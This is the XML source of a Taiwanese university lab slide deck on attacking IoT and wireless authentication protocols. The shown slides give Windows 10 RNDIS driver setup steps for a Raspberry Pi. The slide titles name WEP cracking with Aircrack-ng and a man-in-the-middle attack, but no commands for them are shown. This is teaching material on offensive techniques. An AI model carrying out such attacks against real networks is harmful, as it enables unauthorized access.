            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>虛擬網路卡驅動程式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E4FCFA-41C0-4FE8-81AD-DAE728C0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/>
              <a:t>下載</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>RNDIS driver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://modclouddownloadprod.blob.core.windows.net/shared/mod-rndis-driver-windows.zip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>raspberry pi(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>TypeC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>與電腦</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>TypeA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>相連</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>右鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>→裝置管理員→通用序列埠控制器裝置清單→未知的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>序列裝置→右鍵更新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>driver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>也有可能在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>COM port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>選擇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>: Browse my computer for driver software”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（瀏覽電腦上的驅動程式軟體）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>選擇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>: Let me pick from a list of device drivers on my computer”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（讓我從電腦上的裝置驅動程式清單中挑選）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>選擇</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>從磁片安裝</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>選擇剛剛下載的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>driver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>資料夾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>需解壓縮</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，點選</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>RNDISCMP.inf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>按</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>close</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>右鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>→設定→網路及網際網路→變更介面卡選項→檢查是否有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>USB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Ethernet/RNDIS Gadget</a:t>
            </a:r>
          </a:p>
          <a:p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1836638344"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="hsng">
  <a:themeElements>
    <a:clrScheme name="HSNG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HSNG">
      <a:majorFont>
        <a:latin typeface="Tahom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HS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NG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NG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NG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SNG">
  <a:themeElements>
    <a:clrScheme name="1_HSNG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HSNG">
      <a:majorFont>
        <a:latin typeface="Tahom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1_HS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NG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NG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NG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hsng</Template>
  <TotalTime>36066</TotalTime>
  <Words>1796</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>寬螢幕</PresentationFormat>
  <Paragraphs>241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Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>hsng</vt:lpstr>
      <vt:lpstr>1_HSNG</vt:lpstr>
      <vt:lpstr>物聯網核心技術 實驗四 物聯網與無線網路認證協定之攻擊</vt:lpstr>
      <vt:lpstr>實驗目標</vt:lpstr>
      <vt:lpstr>設備</vt:lpstr>
      <vt:lpstr>實驗前應安裝軟體</vt:lpstr>
      <vt:lpstr>安裝raspbian</vt:lpstr>
      <vt:lpstr>Headless installation (wifi)</vt:lpstr>
      <vt:lpstr>wpa_supplicant.conf</vt:lpstr>
      <vt:lpstr>在 Windows 10 上安裝 USB 虛擬網路卡驅動程式</vt:lpstr>
      <vt:lpstr>在 Windows 10 上安裝 USB 虛擬網路卡驅動程式</vt:lpstr>
      <vt:lpstr>目標一: Aircrack-ng破解WEP協定密碼</vt:lpstr>
      <vt:lpstr>背景</vt:lpstr>
      <vt:lpstr>背景</vt:lpstr>
      <vt:lpstr>工具說明</vt:lpstr>
      <vt:lpstr>Headless installation (USB)</vt:lpstr>
      <vt:lpstr>Raspberry pi初始設定</vt:lpstr>
      <vt:lpstr>設定usb interface</vt:lpstr>
      <vt:lpstr>設定WIN 10 RNDIS IP </vt:lpstr>
      <vt:lpstr>設定監聽模式</vt:lpstr>
      <vt:lpstr>破解WEP</vt:lpstr>
      <vt:lpstr>破解WEP</vt:lpstr>
      <vt:lpstr>復原</vt:lpstr>
      <vt:lpstr>目標二：Man-in-the-middle attack</vt:lpstr>
      <vt:lpstr>初始設定</vt:lpstr>
      <vt:lpstr>Raspberry pi設定</vt:lpstr>
      <vt:lpstr>Raspberry pi設定</vt:lpstr>
      <vt:lpstr>Raspberry pi設定</vt:lpstr>
      <vt:lpstr>server端設定</vt:lpstr>
      <vt:lpstr>server端設定</vt:lpstr>
      <vt:lpstr>設定WIN 10 RNDIS IP </vt:lpstr>
      <vt:lpstr>Demo</vt:lpstr>
      <vt:lpstr>參考資料</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager>黃仁竑</Manager>
  <Company>HSNG, Dept. of CS, Chung Cheng Univ., Taiwan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of Peregrine</dc:title>
  <dc:creator>Yen Chuang</dc:creator>
  <dc:description>copyright belongs to Ren-Hung Hwang</dc:description>
  <cp:lastModifiedBy>莊諺</cp:lastModifiedBy>
  <cp:revision>1403</cp:revision>
  <cp:lastPrinted>2021-09-16T04:03:33Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-09-30T03:49:19Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-30T03:13:18Z</dcterms:modified>
  <cp:version>1</cp:version>
</cp:coreProperties>
</file>